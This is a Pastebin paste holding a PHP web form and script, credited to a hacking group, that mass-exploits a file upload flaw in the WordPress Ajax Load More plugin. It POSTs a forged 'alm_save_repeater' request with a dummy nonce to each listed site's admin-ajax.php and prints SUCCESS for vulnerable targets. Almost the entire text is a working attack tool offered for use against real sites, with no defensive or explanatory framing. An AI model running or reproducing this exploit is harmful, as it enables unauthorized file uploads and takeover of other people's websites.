Advertisement
CYBERSERKERS

Ajax Load More AFU Exploiter

Nov 17th, 2015
188
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.46 KB | None | 0 0
  1. <meta content="XPLOITER BY AZZATSSINS CYBERSERKERS OF PSYCHOPATH" name="description" />
  2. <title>!!!- AFU | WordPress Ajax Load More | AZZATSSINS | BN-IDBTE4M -!!!</title>
  3. <body style='color: #000000;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
  4. <center>
  5. <form method="POST">
  6. <input style="margin:1px;padding:3px;max-width:90%;font-size:12px;background:#fff;width:60%;color:#333;border-radius:5px;border:3px solid #ddd;text-align:center" value="" type="text" name="azzatssins"/><input style="background:dodgerblue;margin:1px;width:15%;padding:6px;color:#fff;border:0;font-weight:bold;" type="submit"
  7. value="EXECUTE" /><br>
  8. <input name="file" type="file" />
  9. </form>
  10. </center>
  11. <?php
  12. /** AZZATSSINS **/
  13.  
  14. /******************************************
  15. ******************************************/
  16.  
  17.  
  18. function hajar($yuerel, $dataAing=null) {
  19.     $cuih = curl_init();
  20.     curl_setopt($cuih, CURLOPT_URL, $yuerel);
  21.     if ($dataAing != null){
  22.         curl_setopt($cuih, CURLOPT_POST, true);
  23.         curl_setopt($cuih, CURLOPT_POSTFIELDS, $dataAing);
  24.     }
  25.     curl_setopt($cuih, CURLOPT_FOLLOWLOCATION, true);
  26.     curl_setopt($cuih, CURLOPT_RETURNTRANSFER, true);
  27.     curl_setopt($cuih, CURLOPT_SSL_VERIFYPEER, false);
  28.     $eks = curl_exec($cuih);
  29.     curl_close($cuih);
  30.     return $eks;
  31. }
  32.  
  33. $site =  $_POST['azzatssins'];
  34. $cafc = $_POST['file'];
  35. $idbte4m = explode("\r\n", $site);
  36. if (!isset($site)) {
  37. } else {
  38.     foreach ($idbte4m as $uri) {
  39.         echo "<br>\n<center>****** <a [email protected]>AZZATSSINS</a> ******</center>";
  40.         echo "<br>\nTarget => " . $uri;
  41.         echo "\n";
  42.         $azzatssinscyberserkers = hajar($uri . "/wp-admin/admin-ajax.php", array(
  43.             "action" => "alm_save_repeater",
  44.             "repeater" => "default",
  45.             "type" => "default",
  46.             "alias" => $cafc,
  47.            "nonce" => "nonce")
  48.         );
  49.         $jason = json_decode($azzatssinscyberserkers, true);
  50.         if ($jason['success'] == false || $jason['message'] == "Wrong request") {
  51.             echo "<br>\n[AFU] => <font color=red>NOT VULNERABLE</font>";
  52.         } else {
  53.             echo "<br>\n[AFU] => <font color=lime>SUCCESS</font>";
  54.             echo "\n[+] MANTEP VROH....!!!\n";
  55. }}}
  56. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement